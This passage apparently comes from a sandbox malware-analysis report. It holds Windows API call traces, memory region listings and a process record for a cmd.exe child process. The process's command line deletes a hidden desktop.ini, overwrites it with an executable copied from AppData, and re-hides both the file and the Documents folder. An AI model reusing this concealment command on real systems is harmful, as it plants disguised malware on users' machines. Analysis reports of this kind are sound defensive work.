0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.564] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.564] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) 
returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.565] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.565] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.566] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.566] ReadFile 
(in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x32, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x32, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.566] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.566] _close (_FileHandle=4) returned 0 [0129.567] FindNextFileW (in: hFindFile=0x380e50, lpFindFileData=0x2ceecc | out: lpFindFileData=0x2ceecc) returned 0 [0129.567] GetLastError () returned 0x12 [0129.567] FindClose (in: hFindFile=0x380e50 | out: hFindFile=0x380e50) returned 1 [0129.567] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0129.568] _close (_FileHandle=3) returned 0 [0129.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.568] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.568] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.568] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.568] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.569] SetConsoleInputExeNameW () returned 0x1 [0129.569] GetConsoleOutputCP () returned 0x1b5 [0129.569] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.569] SetThreadUILanguage (LangId=0x0) 
returned 0x409 [0129.569] exit (_Code=0) Process: id = "94" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16680" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11141 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11142 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11143 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11144 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11145 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11146 start_va 
= 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11147 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11148 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11149 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 11150 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11199 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11200 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11201 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11202 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 11203 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 11204 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11205 start_va = 0x75540000 
end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11206 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11207 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11208 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11209 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11210 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11211 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11212 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11213 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 11214 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" 
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11215 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11216 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11217 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 11218 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 11219 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 11220 start_va = 0x580000 end_va = 0x680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11221 start_va = 0x690000 end_va = 0x128ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 11222 start_va = 0x1290000 end_va = 0x13f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 11223 start_va = 0x1400000 end_va = 0x16cefff entry_point = 0x1400000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 151 os_tid = 0x8d0 [0129.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f7c4 | out: lpSystemTimeAsFileTime=0x26f7c4*(dwLowDateTime=0x87236ee0, dwHighDateTime=0x1d440a9)) [0129.526] GetCurrentProcessId () returned 0x8d4 [0129.526] GetCurrentThreadId () returned 0x8d0 [0129.526] GetTickCount () returned 0x296e1 
[0129.526] QueryPerformanceCounter (in: lpPerformanceCount=0x26f7bc | out: lpPerformanceCount=0x26f7bc*=18631547790) returned 1 [0129.527] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0129.527] __set_app_type (_Type=0x1) [0129.527] __p__fmode () returned 0x76b331f4 [0129.527] __p__commode () returned 0x76b331fc [0129.527] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0129.527] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0129.527] GetCurrentThreadId () returned 0x8d0 [0129.527] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8d0) returned 0x38 [0129.527] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.527] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0129.527] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.528] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.528] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f754 | out: phkResult=0x26f754*=0x0) returned 0x2 [0129.528] VirtualQuery (in: lpAddress=0x26f78b, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.528] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.528] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x171000, AllocationBase=0x170000, 
AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.528] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.528] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f724, dwLength=0x1c | out: lpBuffer=0x26f724*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0129.528] GetConsoleOutputCP () returned 0x1b5 [0129.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.528] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0129.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.528] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0129.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.528] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.529] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.529] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.529] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.529] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.529] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0129.529] GetEnvironmentStringsW () returned 0x380418* [0129.529] FreeEnvironmentStringsW (penv=0x380418) returned 1 [0129.529] GetEnvironmentStringsW () returned 0x380418* [0129.529] FreeEnvironmentStringsW (penv=0x380418) returned 1 [0129.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6c4 | out: phkResult=0x26e6c4*=0x40) returned 0x0 [0129.530] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0xc8, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x1, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x1, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x0, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x40, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x40, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x40, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegCloseKey (hKey=0x40) returned 0x0 [0129.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6c4 | out: phkResult=0x26e6c4*=0x40) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x40, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x1, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x1, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x0, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x9, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x4, lpData=0x26e6d0*=0x9, lpcbData=0x26e6c8*=0x4) returned 0x0 [0129.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6cc, lpData=0x26e6d0, lpcbData=0x26e6c8*=0x1000 | out: lpType=0x26e6cc*=0x0, lpData=0x26e6d0*=0x9, lpcbData=0x26e6c8*=0x1000) returned 0x2 [0129.530] RegCloseKey (hKey=0x40) returned 0x0 [0129.530] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886364 [0129.530] srand (_Seed=0x5b886364) [0129.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 